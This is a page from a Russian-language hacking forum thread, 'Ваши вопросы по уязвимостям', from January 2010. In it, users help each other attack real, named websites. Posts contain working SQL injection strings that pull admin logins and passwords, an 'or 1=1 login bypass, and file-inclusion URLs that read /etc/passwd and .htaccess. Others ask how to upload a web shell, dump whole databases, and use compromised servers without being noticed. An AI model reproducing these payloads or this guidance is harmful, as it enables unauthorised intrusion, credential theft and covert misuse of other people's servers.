Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sNt

    sNt Elder - Старейшина

    Joined:
    30 Jul 2008
    Messages:
    117
    Likes Received:
    11
    Reputations:
    1
    Чо делать после с базой после расшифровки паса? Я тут одну вскрыл, но хз, что с ней делать. И как найти админку? КУды входить по этому пасу? :confused:
     
    #11181 sNt, 24 Jan 2010
    Last edited: 24 Jan 2010
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну спс уже прочел но там:
    substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

    и в моем случае
    ?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
    тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц
     
  3. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а с чего ты вззял что там скуля?
     
  5. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    Упс, там случилось что-то, не работает скрипт, ещё вчера была форма входа с sql
    Извиняюсь, ссылка битая теперь тут всё это лежит: http://dmironova.ru/admin/?lang=no
     
  6. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    http://dmironova.ru/admin/
    'or 1=1/*

    http://dmironova.ru/admin/login.php?lang=../../../../../../etc/passwd%00
     
    #11186 v1d0qz, 24 Jan 2010
    Last edited: 24 Jan 2010
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    инклуд?
     
  8. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    http://dmironova.ru/admin/login.php?lang=/../../../../../../../../../../../../../../etc/passwd%00
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Да, инклуд.
    Code:
    http://dmironova.ru/admin/login.php?lang=../../.htaccess%00
     
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    А то, что по второй ссылке прочитал ? Там показано как использовать лимит при фильтрации запятых.

    Вот похожая ситуация
    https://forum.antichat.ru/showpost.php?p=1550051

    Разберись что и как и подгони запрос под свою скулю.
     
    2 people like this.
  11. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    Собственно получил доступ к админке одного сайта, с расширением php файлы не хочет кушать , пробывал заливать с расширением php.jpg но тоже не помогает (так же можно залить в .doc .pdf форматах).. такое часто у меня случается , может есть какие либо способы залить шелл ещё ?
     
  12. aka_google

    aka_google Well-Known Member

    Joined:
    8 Jan 2010
    Messages:
    296
    Likes Received:
    1,851
    Reputations:
    2
    Database Version: 5.0.32-Debian_7etch5-log

    Проблемма такова делаю выборку :

    _http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,login,0x2d2d2d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+FROM+users+LIMIT+1,1--
    показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей .

    кто что думает ?
     
    #11192 aka_google, 25 Jan 2010
    Last edited: 25 Jan 2010
  13. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    инъекция или нет?
     
  14. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 GinTonic
    Code:
    http://hardon.ru/index.php?action=getCat&catid=110+union+select+version()
     
    4 people like this.
  15. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    Такая ситуация есть сайт со скулей,но стоит лимит на вывод , БД довольнотаки большая , есть ли у кого мысли как сразу всё слить?шелл пока что не удалось залить =/
     
    #11195 erolom, 25 Jan 2010
    Last edited: 26 Jan 2010
  16. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    использовать GROUP_CONCAT()
    лучше вариантов вроде нету.
    https://forum.antichat.ru/showthread.php?t=118842
     
  17. NeKit

    NeKit New Member

    Joined:
    29 Dec 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?
     
  18. NeKit

    NeKit New Member

    Joined:
    29 Dec 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Клиента конечно. Так и модифицировать на стороне клиента.
     
  19. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.
     
  20. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    хелп, помогите победить :)
    Code:
    http://xxx/browse.php?cat=999999999'+union+select+1,2,3,4,5,6+--+
     
    #11200 Gidz, 27 Jan 2010
    Last edited: 27 Jan 2010
Thread Status:
Not open for further replies.